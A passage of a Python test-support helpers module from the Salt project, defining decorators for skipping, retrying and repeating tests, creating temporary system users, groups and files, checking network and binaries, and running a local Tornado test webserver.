Mark a test case as an expensive test, for example, a test which can cost
money(Salt's cloud provider tests).
.. code-block:: python
class MyTestCase(TestCase):
@expensiveTest
def test_create_user(self):
pass
"""
# Late import
from tests.support.runtests import RUNTIME_VARS
if RUNTIME_VARS.PYTEST_SESSION:
setattr(caller, "__expensive_test__", True)
if os.environ.get("EXPENSIVE_TESTS", "False").lower() == "false":
reason = "Expensive tests are disabled"
if not isinstance(caller, type):
@functools.wraps(caller)
def skip_wrapper(*args, **kwargs):
raise SkipTest(reason)
caller = skip_wrapper
caller.__unittest_skip__ = True
caller.__unittest_skip_why__ = reason
return caller
def slowTest(caller):
"""
Mark a test case as a slow test.
.. code-block:: python
class MyTestCase(TestCase):
@slowTest
def test_that_takes_much_time(self):
pass
"""
# Late import
from tests.support.runtests import RUNTIME_VARS
if RUNTIME_VARS.PYTEST_SESSION:
setattr(caller, "__slow_test__", True)
if os.environ.get("SLOW_TESTS", "False").lower() == "false":
reason = "Slow tests are disabled"
if not isinstance(caller, type):
@functools.wraps(caller)
def skip_wrapper(*args, **kwargs):
raise SkipTest(reason)
caller = skip_wrapper
caller.__unittest_skip__ = True
caller.__unittest_skip_why__ = reason
return caller
def flaky(caller=None, condition=True, attempts=4):
"""
Mark a test as flaky. The test will attempt to run five times,
looking for a successful run. After an immediate second try,
it will use an exponential backoff starting with one second.
.. code-block:: python
class MyTestCase(TestCase):
@flaky
def test_sometimes_works(self):
pass
"""
if caller is None:
return functools.partial(flaky, condition=condition, attempts=attempts)
if isinstance(condition, bool) and condition is False:
# Don't even decorate
return caller
elif callable(condition):
if condition() is False:
# Don't even decorate
return caller
if inspect.isclass(caller):
attrs = [n for n in dir(caller) if n.startswith("test_")]
for attrname in attrs:
try:
function = getattr(caller, attrname)
if not inspect.isfunction(function) and not inspect.ismethod(function):
continue
setattr(
caller,
attrname,
flaky(caller=function, condition=condition, attempts=attempts),
)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
continue
return caller
@functools.wraps(caller)
def wrap(cls):
for attempt in range(0, attempts):
try:
if attempt > 0:
# Run through setUp again
# We only run it after the first iteration(>0) because the regular
# test runner will have already ran setUp the first time
setup = getattr(cls, "setUp", None)
if callable(setup):
setup()
return caller(cls)
except SkipTest as exc:
cls.skipTest(exc.args[0])
except Exception as exc: # pylint: disable=broad-except
exc_info = sys.exc_info()
if isinstance(exc, SkipTest):
six.reraise(*exc_info)
if not isinstance(exc, AssertionError) and log.isEnabledFor(
logging.DEBUG
):
log.exception(exc, exc_info=exc_info)
if attempt >= attempts - 1:
# We won't try to run tearDown once the attempts are exhausted
# because the regular test runner will do that for us
six.reraise(*exc_info)
# Run through tearDown again
teardown = getattr(cls, "tearDown", None)
if callable(teardown):
teardown()
backoff_time = attempt ** 2
log.info("Found Exception. Waiting %s seconds to retry.", backoff_time)
time.sleep(backoff_time)
return cls
return wrap
def requires_sshd_server(caller):
"""
Mark a test as requiring the tests SSH daemon running.
.. code-block:: python
class MyTestCase(TestCase):
@requiresSshdServer
def test_create_user(self):
pass
"""
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, "setUp", None)
def setUp(self, *args, **kwargs):
if os.environ.get("SSH_DAEMON_RUNNING", "False").lower() == "false":
self.skipTest("SSH tests are disabled")
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrap(cls):
if os.environ.get("SSH_DAEMON_RUNNING", "False").lower() == "false":
cls.skipTest("SSH tests are disabled")
return caller(cls)
return wrap
class RedirectStdStreams(object):
"""
Temporarily redirect system output to file like objects.
Default is to redirect to `os.devnull`, which just mutes output, `stdout`
and `stderr`.
"""
def __init__(self, stdout=None, stderr=None):
# Late import
import salt.utils.files
if stdout is None:
# pylint: disable=resource-leakage
stdout = salt.utils.files.fopen(os.devnull, "w")
# pylint: enable=resource-leakage
if stderr is None:
# pylint: disable=resource-leakage
stderr = salt.utils.files.fopen(os.devnull, "w")
# pylint: enable=resource-leakage
self.__stdout = stdout
self.__stderr = stderr
self.__redirected = False
self.patcher = patch.multiple(sys, stderr=self.__stderr, stdout=self.__stdout)
def __enter__(self):
self.redirect()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.unredirect()
def redirect(self):
self.old_stdout = sys.stdout
self.old_stdout.flush()
self.old_stderr = sys.stderr
self.old_stderr.flush()
self.patcher.start()
self.__redirected = True
def unredirect(self):
if not self.__redirected:
return
try:
self.__stdout.flush()
self.__stdout.close()
except ValueError:
# already closed?
pass
try:
self.__stderr.flush()
self.__stderr.close()
except ValueError:
# already closed?
pass
self.patcher.stop()
def flush(self):
if self.__redirected:
try:
self.__stdout.flush()
except Exception: # pylint: disable=broad-except
pass
try:
self.__stderr.flush()
except Exception: # pylint: disable=broad-except
pass
class TstSuiteLoggingHandler(object):
"""
Simple logging handler which can be used to test if certain logging
messages get emitted or not:
.. code-block:: python
with TstSuiteLoggingHandler() as handler:
# (...) Do what ever you wish here
handler.messages # here are the emitted log messages
"""
def __init__(self, level=0, format="%(levelname)s:%(message)s"):
self.level = level
self.format = format
self.activated = False
self.prev_logging_level = None
def activate(self):
class Handler(logging.Handler):
def __init__(self, level):
logging.Handler.__init__(self, level)
self.messages = []
def emit(self, record):
self.messages.append(self.format(record))
self.handler = Handler(self.level)
formatter = logging.Formatter(self.format)
self.handler.setFormatter(formatter)
logging.root.addHandler(self.handler)
self.activated = True
# Make sure we're running with the lowest logging level with our
# tests logging handler
current_logging_level = logging.root.getEffectiveLevel()
if current_logging_level > logging.DEBUG:
self.prev_logging_level = current_logging_level
logging.root.setLevel(0)
def deactivate(self):
if not self.activated:
return
logging.root.removeHandler(self.handler)
# Restore previous logging level if changed
if self.prev_logging_level is not None:
logging.root.setLevel(self.prev_logging_level)
@property
def messages(self):
if not self.activated:
return []
return self.handler.messages
def clear(self):
self.handler.messages = []
def __enter__(self):
self.activate()
return self
def __exit__(self, type, value, traceback):
self.deactivate()
self.activated = False
# Mimic some handler attributes and methods
@property
def lock(self):
if self.activated:
return self.handler.lock
def createLock(self):
if self.activated:
return self.handler.createLock()
def acquire(self):
if self.activated:
return self.handler.acquire()
def release(self):
if self.activated:
return self.handler.release()
class ForceImportErrorOn(object):
"""
This class is meant to be used in mock'ed test cases which require an
``ImportError`` to be raised.
>>> import os.path
>>> with ForceImportErrorOn('os.path'):
... import os.path
...
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "salttesting/helpers.py", line 263, in __import__
'Forced ImportError raised for {0!r}'.format(name)
ImportError: Forced ImportError raised for 'os.path'
>>>
>>> with ForceImportErrorOn(('os', 'path')):
... import os.path
... sys.modules.pop('os', None)
... from os import path
...
<module 'os' from '/usr/lib/python2.7/os.pyc'>
Traceback (most recent call last):
File "<stdin>", line 4, in <module>
File "salttesting/helpers.py", line 288, in __fake_import__
name, ', '.join(fromlist)
ImportError: Forced ImportError raised for 'from os import path'
>>>
>>> with ForceImportErrorOn(('os', 'path'), 'os.path'):
... import os.path
... sys.modules.pop('os', None)
... from os import path
...
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "salttesting/helpers.py", line 281, in __fake_import__
'Forced ImportError raised for {0!r}'.format(name)
ImportError: Forced ImportError raised for 'os.path'
>>>
"""
def __init__(self, *module_names):
self.__module_names = {}
for entry in module_names:
if isinstance(entry, (list, tuple)):
modname = entry[0]
self.__module_names[modname] = set(entry[1:])
else:
self.__module_names[entry] = None
self.__original_import = builtins.__import__
self.patcher = patch.object(builtins, "__import__", self.__fake_import__)
def patch_import_function(self):
self.patcher.start()
def restore_import_funtion(self):
self.patcher.stop()
def __fake_import__(
self, name, globals_=None, locals_=None, fromlist=None, level=None
):
if six.PY2:
if globals_ is None:
globals_ = {}
if locals_ is None:
locals_ = {}
if level is None:
if six.PY2:
level = -1
else:
level = 0
if fromlist is None:
fromlist = []
if name in self.__module_names:
importerror_fromlist = self.__module_names.get(name)
if importerror_fromlist is None:
raise ImportError("Forced ImportError raised for {0!r}".format(name))
if importerror_fromlist.intersection(set(fromlist)):
raise ImportError(
"Forced ImportError raised for {0!r}".format(
"from {0} import {1}".format(name, ", ".join(fromlist))
)
)
return self.__original_import(name, globals_, locals_, fromlist, level)
def __enter__(self):
self.patch_import_function()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.restore_import_funtion()
class MockWraps(object):
"""
Helper class to be used with the mock library.
To be used in the ``wraps`` keyword of ``Mock`` or ``MagicMock`` where you
want to trigger a side effect for X times, and afterwards, call the
original and un-mocked method.
As an example:
>>> def original():
... print 'original'
...
>>> def side_effect():
... print 'side effect'
...
>>> mw = MockWraps(original, 2, side_effect)
>>> mw()
side effect
>>> mw()
side effect
>>> mw()
original
>>>
"""
def __init__(self, original, expected_failures, side_effect):
self.__original = original
self.__expected_failures = expected_failures
self.__side_effect = side_effect
self.__call_counter = 0
def __call__(self, *args, **kwargs):
try:
if self.__call_counter < self.__expected_failures:
if isinstance(self.__side_effect, types.FunctionType):
return self.__side_effect()
raise self.__side_effect
return self.__original(*args, **kwargs)
finally:
self.__call_counter += 1
def requires_network(only_local_network=False):
"""
Simple decorator which is supposed to skip a test case in case there's no
network connection to the internet.
"""
def decorator(func):
@functools.wraps(func)
def wrapper(cls, *args, **kwargs):
has_local_network = False
# First lets try if we have a local network. Inspired in
# verify_socket
try:
pubsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
retsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
pubsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
pubsock.bind(("", 18000))
pubsock.close()
retsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
retsock.bind(("", 18001))
retsock.close()
has_local_network = True
except socket.error:
# I wonder if we just have IPV6 support?
try:
pubsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
retsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
pubsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
pubsock.bind(("", 18000))
pubsock.close()
retsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
retsock.bind(("", 18001))
retsock.close()
has_local_network = True
except socket.error:
# Let's continue
pass
if only_local_network is True:
if has_local_network is False:
# Since we're only supposed to check local network, and no
# local network was detected, skip the test
cls.skipTest("No local network was detected")
return func(cls)
if os.environ.get("NO_INTERNET"):
cls.skipTest("Environment variable NO_INTERNET is set.")
# We are using the google.com DNS records as numerical IPs to avoid
# DNS lookups which could greatly slow down this check
for addr in (
"173.194.41.198",
"173.194.41.199",
"173.194.41.200",
"173.194.41.201",
"173.194.41.206",
"173.194.41.192",
"173.194.41.193",
"173.194.41.194",
"173.194.41.195",
"173.194.41.196",
"173.194.41.197",
):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.settimeout(0.25)
sock.connect((addr, 80))
# We connected? Stop the loop
break
except socket.error:
# Let's check the next IP
continue
else:
cls.skipTest("No internet network connection was detected")
finally:
sock.close()
return func(cls, *args, **kwargs)
return wrapper
return decorator
def with_system_user(
username, on_existing="delete", delete=True, password=None, groups=None
):
"""
Create and optionally destroy a system user to be used within a test
case. The system user is created using the ``user`` salt module.
The decorated testcase function must accept 'username' as an argument.
:param username: The desired username for the system user.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the user was created.
* delete: delete and re-create the existing user
* skip: skip the test case
"""
if on_existing not in ("nothing", "delete", "skip"):
raise RuntimeError(
"The value of 'on_existing' can only be one of, "
"'nothing', 'delete' and 'skip'"
)
if not isinstance(delete, bool):
raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug("Creating system user {0!r}".format(username))
kwargs = {"timeout": 60, "groups": groups}
if salt.utils.platform.is_windows():
kwargs.update({"password": password})
create_user = cls.run_function("user.add", [username], **kwargs)
if not create_user:
log.debug("Failed to create system user")
# The user was not created
if on_existing == "skip":
cls.skipTest("Failed to create system user {0!r}".format(username))
if on_existing == "delete":
log.debug("Deleting the system user {0!r}".format(username))
delete_user = cls.run_function(
"user.delete", [username, True, True]
)
if not delete_user:
cls.skipTest(
"A user named {0!r} already existed on the "
"system and re-creating it was not possible".format(
username
)
)
log.debug("Second time creating system user {0!r}".format(username))
create_user = cls.run_function("user.add", [username], **kwargs)
if not create_user:
cls.skipTest(
"A user named {0!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
username
)
)
if not salt.utils.platform.is_windows() and password is not None:
if salt.utils.platform.is_darwin():
hashed_password = password
else:
hashed_password = salt.utils.pycrypto.gen_hash(
crypt_salt="SALTsalt", password=password
)
hashed_password = "'{0}'".format(hashed_password)
add_pwd = cls.run_function(
"shadow.set_password", [username, hashed_password]
)
failure = None
try:
try:
return func(cls, username)
except Exception as exc: # pylint: disable=W0703
log.error(
"Running {0!r} raised an exception: {1}".format(func, exc),
exc_info=True,
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_user = cls.run_function(
"user.delete", [username, True, True], timeout=60
)
if not delete_user:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system user {0!r} "
"afterwards did.".format(username)
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system user {0!r}".format(username)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
def with_system_group(group, on_existing="delete", delete=True):
"""
Create and optionally destroy a system group to be used within a test
case. The system user is crated using the ``group`` salt module.
The decorated testcase function must accept 'group' as an argument.
:param group: The desired group name for the system user.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the group was created
* delete: delete and re-create the existing user
* skip: skip the test case
"""
if on_existing not in ("nothing", "delete", "skip"):
raise RuntimeError(
"The value of 'on_existing' can only be one of, "
"'nothing', 'delete' and 'skip'"
)
if not isinstance(delete, bool):
raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug("Creating system group {0!r}".format(group))
create_group = cls.run_function("group.add", [group])
if not create_group:
log.debug("Failed to create system group")
# The group was not created
if on_existing == "skip":
cls.skipTest("Failed to create system group {0!r}".format(group))
if on_existing == "delete":
log.debug("Deleting the system group {0!r}".format(group))
delete_group = cls.run_function("group.delete", [group])
if not delete_group:
cls.skipTest(
"A group named {0!r} already existed on the "
"system and re-creating it was not possible".format(group)
)
log.debug("Second time creating system group {0!r}".format(group))
create_group = cls.run_function("group.add", [group])
if not create_group:
cls.skipTest(
"A group named {0!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
group
)
)
failure = None
try:
try:
return func(cls, group)
except Exception as exc: # pylint: disable=W0703
log.error(
"Running {0!r} raised an exception: {1}".format(func, exc),
exc_info=True,
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_group = cls.run_function("group.delete", [group])
if not delete_group:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system group {0!r} "
"afterwards did.".format(group)
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system group {0!r}".format(group)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
def with_system_user_and_group(username, group, on_existing="delete", delete=True):
"""
Create and optionally destroy a system user and group to be used within a
test case. The system user is crated using the ``user`` salt module, and
the system group is created with the ``group`` salt module.
The decorated testcase function must accept both the 'username' and 'group'
arguments.
:param username: The desired username for the system user.
:param group: The desired name for the system group.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the user was created.
* delete: delete and re-create the existing user
* skip: skip the test case
"""
if on_existing not in ("nothing", "delete", "skip"):
raise RuntimeError(
"The value of 'on_existing' can only be one of, "
"'nothing', 'delete' and 'skip'"
)
if not isinstance(delete, bool):
raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug("Creating system user {0!r}".format(username))
create_user = cls.run_function("user.add", [username])
log.debug("Creating system group {0!r}".format(group))
create_group = cls.run_function("group.add", [group])
if not create_user:
log.debug("Failed to create system user")
# The user was not created
if on_existing == "skip":
cls.skipTest("Failed to create system user {0!r}".format(username))
if on_existing == "delete":
log.debug("Deleting the system user {0!r}".format(username))
delete_user = cls.run_function(
"user.delete", [username, True, True]
)
if not delete_user:
cls.skipTest(
"A user named {0!r} already existed on the "
"system and re-creating it was not possible".format(
username
)
)
log.debug("Second time creating system user {0!r}".format(username))
create_user = cls.run_function("user.add", [username])
if not create_user:
cls.skipTest(
"A user named {0!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
username
)
)
if not create_group:
log.debug("Failed to create system group")
# The group was not created
if on_existing == "skip":
cls.skipTest("Failed to create system group {0!r}".format(group))
if on_existing == "delete":
log.debug("Deleting the system group {0!r}".format(group))
delete_group = cls.run_function("group.delete", [group])
if not delete_group:
cls.skipTest(
"A group named {0!r} already existed on the "
"system and re-creating it was not possible".format(group)
)
log.debug("Second time creating system group {0!r}".format(group))
create_group = cls.run_function("group.add", [group])
if not create_group:
cls.skipTest(
"A group named {0!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
group
)
)
failure = None
try:
try:
return func(cls, username, group)
except Exception as exc: # pylint: disable=W0703
log.error(
"Running {0!r} raised an exception: {1}".format(func, exc),
exc_info=True,
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_user = cls.run_function(
"user.delete", [username, True, True]
)
delete_group = cls.run_function("group.delete", [group])
if not delete_user:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system user {0!r} "
"afterwards did.".format(username)
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system user {0!r}".format(username)
)
if not delete_group:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system group {0!r} "
"afterwards did.".format(group)
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system group {0!r}".format(group)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
class WithTempfile(object):
def __init__(self, **kwargs):
self.create = kwargs.pop("create", True)
if "dir" not in kwargs:
kwargs["dir"] = RUNTIME_VARS.TMP
if "prefix" not in kwargs:
kwargs["prefix"] = "__salt.test."
self.kwargs = kwargs
def __call__(self, func):
self.func = func
return functools.wraps(func)(
# pylint: disable=unnecessary-lambda
lambda testcase, *args, **kwargs: self.wrap(testcase, *args, **kwargs)
# pylint: enable=unnecessary-lambda
)
def wrap(self, testcase, *args, **kwargs):
name = salt.utils.files.mkstemp(**self.kwargs)
if not self.create:
os.remove(name)
try:
return self.func(testcase, name, *args, **kwargs)
finally:
try:
os.remove(name)
except OSError:
pass
with_tempfile = WithTempfile
class WithTempdir(object):
def __init__(self, **kwargs):
self.create = kwargs.pop("create", True)
if "dir" not in kwargs:
kwargs["dir"] = RUNTIME_VARS.TMP
self.kwargs = kwargs
def __call__(self, func):
self.func = func
return functools.wraps(func)(
# pylint: disable=unnecessary-lambda
lambda testcase, *args, **kwargs: self.wrap(testcase, *args, **kwargs)
# pylint: enable=unnecessary-lambda
)
def wrap(self, testcase, *args, **kwargs):
tempdir = tempfile.mkdtemp(**self.kwargs)
if not self.create:
os.rmdir(tempdir)
try:
return self.func(testcase, tempdir, *args, **kwargs)
finally:
shutil.rmtree(tempdir, ignore_errors=True)
with_tempdir = WithTempdir
def requires_system_grains(func):
"""
Function decorator which loads and passes the system's grains to the test
case.
"""
@functools.wraps(func)
def decorator(*args, **kwargs):
if not hasattr(requires_system_grains, "__grains__"):
# Late import
from tests.support.sminion import build_minion_opts
opts = build_minion_opts(minion_id="runtests-internal-sminion")
requires_system_grains.__grains__ = salt.loader.grains(opts)
kwargs["grains"] = requires_system_grains.__grains__
return func(*args, **kwargs)
return decorator
@requires_system_grains
def runs_on(grains=None, **kwargs):
"""
Skip the test if grains don't match the values passed into **kwargs
if a kwarg value is a list then skip if the grains don't match any item in the list
"""
reason = kwargs.pop("reason", None)
for kw, value in kwargs.items():
if isinstance(value, list):
if not any(str(grains.get(kw)).lower() != str(v).lower() for v in value):
if reason is None:
reason = "This test does not run on {}={}".format(
kw, grains.get(kw)
)
return skip(reason)
else:
if str(grains.get(kw)).lower() != str(value).lower():
if reason is None:
reason = "This test runs on {}={}, not {}".format(
kw, value, grains.get(kw)
)
return skip(reason)
return _id
@requires_system_grains
def not_runs_on(grains=None, **kwargs):
"""
Reverse of `runs_on`.
Skip the test if any grains match the values passed into **kwargs
if a kwarg value is a list then skip if the grains match any item in the list
"""
reason = kwargs.pop("reason", None)
for kw, value in kwargs.items():
if isinstance(value, list):
if any(str(grains.get(kw)).lower() == str(v).lower() for v in value):
if reason is None:
reason = "This test does not run on {}={}".format(
kw, grains.get(kw)
)
return skip(reason)
else:
if str(grains.get(kw)).lower() == str(value).lower():
if reason is None:
reason = "This test does not run on {}={}, got {}".format(
kw, value, grains.get(kw)
)
return skip(reason)
return _id
def _check_required_sminion_attributes(sminion_attr, *required_items):
"""
:param sminion_attr: The name of the sminion attribute to check, such as 'functions' or 'states'
:param required_items: The items that must be part of the designated sminion attribute for the decorated test
:return The packages that are not available
"""
# Late import
from tests.support.sminion import create_sminion
required_salt_items = set(required_items)
sminion = create_sminion(minion_id="runtests-internal-sminion")
available_items = list(getattr(sminion, sminion_attr))
not_available_items = set()
name = "__not_available_{items}s__".format(items=sminion_attr)
if not hasattr(sminion, name):
setattr(sminion, name, set())
cached_not_available_items = getattr(sminion, name)
for not_available_item in cached_not_available_items:
if not_available_item in required_salt_items:
not_available_items.add(not_available_item)
required_salt_items.remove(not_available_item)
for required_item_name in required_salt_items:
search_name = required_item_name
if "." not in search_name:
search_name += ".*"
if not fnmatch.filter(available_items, search_name):
not_available_items.add(required_item_name)
cached_not_available_items.add(required_item_name)
return not_available_items
def requires_salt_states(*names):
"""
Makes sure the passed salt state is available. Skips the test if not
.. versionadded:: 3000
"""
not_available = _check_required_sminion_attributes("states", *names)
if not_available:
return skip("Unavailable salt states: {}".format(*not_available))
return _id
def requires_salt_modules(*names):
"""
Makes sure the passed salt module is available. Skips the test if not
.. versionadded:: 0.5.2
"""
not_available = _check_required_sminion_attributes("functions", *names)
if not_available:
return skip("Unavailable salt modules: {}".format(*not_available))
return _id
def skip_if_binaries_missing(*binaries, **kwargs):
import salt.utils.path
if len(binaries) == 1:
if isinstance(binaries[0], (list, tuple, set, frozenset)):
binaries = binaries[0]
check_all = kwargs.pop("check_all", False)
message = kwargs.pop("message", None)
if kwargs:
raise RuntimeError(
"The only supported keyword argument is 'check_all' and "
"'message'. Invalid keyword arguments: {0}".format(", ".join(kwargs.keys()))
)
if check_all:
for binary in binaries:
if salt.utils.path.which(binary) is None:
return skip(
"{0}The {1!r} binary was not found".format(
message and "{0}. ".format(message) or "", binary
)
)
elif salt.utils.path.which_bin(binaries) is None:
return skip(
"{0}None of the following binaries was found: {1}".format(
message and "{0}. ".format(message) or "", ", ".join(binaries)
)
)
return _id
def skip_if_not_root(func):
# Late import
from tests.support.runtests import RUNTIME_VARS
if RUNTIME_VARS.PYTEST_SESSION:
setattr(func, "__skip_if_not_root__", True)
if not sys.platform.startswith("win"):
if os.getuid() != 0:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = (
"You must be logged in as root to run this test"
)
else:
current_user = salt.utils.win_functions.get_current_user()
if current_user != "SYSTEM":
if not salt.utils.win_functions.is_admin(current_user):
func.__unittest_skip__ = True
func.__unittest_skip_why__ = (
"You must be logged in as an Administrator to run this test"
)
return func
def repeat(caller=None, condition=True, times=5):
"""
Repeat a test X amount of times until the first failure.
.. code-block:: python
class MyTestCase(TestCase):
@repeat
def test_sometimes_works(self):
pass
"""
if caller is None:
return functools.partial(repeat, condition=condition, times=times)
if isinstance(condition, bool) and condition is False:
# Don't even decorate
return caller
elif callable(condition):
if condition() is False:
# Don't even decorate
return caller
if inspect.isclass(caller):
attrs = [n for n in dir(caller) if n.startswith("test_")]
for attrname in attrs:
try:
function = getattr(caller, attrname)
if not inspect.isfunction(function) and not inspect.ismethod(function):
continue
setattr(
caller,
attrname,
repeat(caller=function, condition=condition, times=times),
)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
continue
return caller
@functools.wraps(caller)
def wrap(cls):
result = None
for attempt in range(1, times + 1):
log.info("%s test run %d of %s times", cls, attempt, times)
caller(cls)
return cls
return wrap
def http_basic_auth(login_cb=lambda username, password: False):
"""
A crude decorator to force a handler to request HTTP Basic Authentication
Example usage:
.. code-block:: python
@http_basic_auth(lambda u, p: u == 'foo' and p == 'bar')
class AuthenticatedHandler(salt.ext.tornado.web.RequestHandler):
pass
"""
def wrapper(handler_class):
def wrap_execute(handler_execute):
def check_auth(handler, kwargs):
auth = handler.request.headers.get("Authorization")
if auth is None or not auth.startswith("Basic "):
# No username/password entered yet, we need to return a 401
# and set the WWW-Authenticate header to request login.
handler.set_status(401)
handler.set_header("WWW-Authenticate", "Basic realm=Restricted")
else:
# Strip the 'Basic ' from the beginning of the auth header
# leaving the base64-encoded secret
username, password = base64.b64decode(auth[6:]).split(":", 1)
if login_cb(username, password):
# Authentication successful
return
else:
# Authentication failed
handler.set_status(403)
handler._transforms = []
handler.finish()
def _execute(self, transforms, *args, **kwargs):
check_auth(self, kwargs)
return handler_execute(self, transforms, *args, **kwargs)
return _execute
handler_class._execute = wrap_execute(handler_class._execute)
return handler_class
return wrapper
def generate_random_name(prefix, size=6):
"""
Generates a random name by combining the provided prefix with a randomly generated
ascii string.
.. versionadded:: 2018.3.0
prefix
The string to prefix onto the randomly generated ascii string.
size
The number of characters to generate. Default: 6.
"""
salt.utils.versions.warn_until_date(
"20220101",
"Please replace your call 'generate_random_name({0})' with 'random_string({0}, lowercase=False)' as "
"'generate_random_name' will be removed after {{date}}".format(prefix),
)
return random_string(prefix, size=size, lowercase=False)
def random_string(prefix, size=6, uppercase=True, lowercase=True, digits=True):
"""
Generates a random string.
..versionadded: 3001
Args:
prefix(str): The prefix for the random string
size(int): The size of the random string
uppercase(bool): If true, include uppercased ascii chars in choice sample
lowercase(bool): If true, include lowercased ascii chars in choice sample
digits(bool): If true, include digits in choice sample
Returns:
str: The random string
"""
if not any([uppercase, lowercase, digits]):
raise RuntimeError(
"At least one of 'uppercase', 'lowercase' or 'digits' needs to be true"
)
choices = []
if uppercase:
choices.extend(string.ascii_uppercase)
if lowercase:
choices.extend(string.ascii_lowercase)
if digits:
choices.extend(string.digits)
return prefix + "".join(random.choice(choices) for _ in range(size))
class Webserver(object):
"""
Starts a tornado webserver on 127.0.0.1 on a random available port
USAGE:
.. code-block:: python
from tests.support.helpers import Webserver
webserver = Webserver('/path/to/web/root')
webserver.start()
webserver.stop()
"""
def __init__(self, root=None, port=None, wait=5, handler=None):
"""
root
Root directory of webserver. If not passed, it will default to the
location of the base environment of the integration suite's file
roots (tests/integration/files/file/base/)
port
Port on which to listen. If not passed, a random one will be chosen
at the time the start() function is invoked.
wait : 5
Number of seconds to wait for the socket to be open before raising
an exception
handler
Can be used to use a subclass of tornado.web.StaticFileHandler,
such as when enforcing authentication with the http_basic_auth
decorator.
"""
if port is not None and not isinstance(port, six.integer_types):
raise ValueError("port must be an integer")
if root is None:
root = RUNTIME_VARS.BASE_FILES
try:
self.root = os.path.realpath(root)
except AttributeError:
raise ValueError("root must be a string")
self.port = port
self.wait = wait
self.handler = (
handler if handler is not None else salt.ext.tornado.web.StaticFileHandler
)
self.web_root = None
def target(self):
"""
Threading target which stands up the tornado application
"""
self.ioloop = salt.ext.tornado.ioloop.IOLoop()
self.ioloop.make_current()
if self.handler == salt.ext.tornado.web.StaticFileHandler:
self.application = salt.ext.tornado.web.Application(
[(r"/(.*)", self.handler, {"path": self.root})]
)
else:
self.application = salt.ext.tornado.web.Application(
[(r"/(.*)", self.handler)]
)
self.application.listen(self.port)
self.ioloop.start()
@property
def listening(self):
if self.port is None:
return False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
return sock.connect_ex(("127.0.0.1", self.port)) == 0
def url(self, path):
"""
Convenience function which, given a file path, will return a URL that
points to that path. If the path is relative, it will just be appended
to self.web_root.
"""
if self.web_root is None:
raise RuntimeError("Webserver instance has not been started")
err_msg = (
"invalid path, must be either a relative path or a path "
"within {0}".format(self.root)
)
try:
relpath = (
path if not os.path.isabs(path) else os.path.relpath(path, self.root)
)
if relpath.startswith(".." + os.sep):
raise ValueError(err_msg)
return "/".join((self.web_root, relpath))
except AttributeError:
raise ValueError(err_msg)
def start(self):
"""
Starts the webserver
"""
if self.port is None:
self.port = get_unused_localhost_port()
self.web_root = "http://127.0.0.1:{0}".format(self.port)
self.server_thread = threading.Thread(target=self.target)
self.server_thread.daemon = True
self.server_thread.start()
for idx in range(self.wait + 1):
if self.listening:
break
if idx != self.wait:
time.sleep(1)
else:
raise Exception(
"Failed to start tornado webserver on 127.0.0.1:{0} within "
"{1} seconds".format(self.port, self.wait)
)
def stop(self):
"""
Stops the webserver
"""
self.ioloop.add_callback(self.ioloop.stop)
self.server_thread.join()
class SaveRequestsPostHandler(salt.ext.tornado.web.RequestHandler):
"""
Save all requests sent to the server.
"""
received_requests = []
def post(self, *args): # pylint: disable=arguments-differ
"""
Handle the post
"""
self.received_requests.append(self.request)
def data_received(self): # pylint: disable=arguments-differ
"""
Streaming not used for testing
"""
raise NotImplementedError()
class MirrorPostHandler(salt.ext.tornado.web.RequestHandler):
"""
Mirror a POST body back to the client
"""
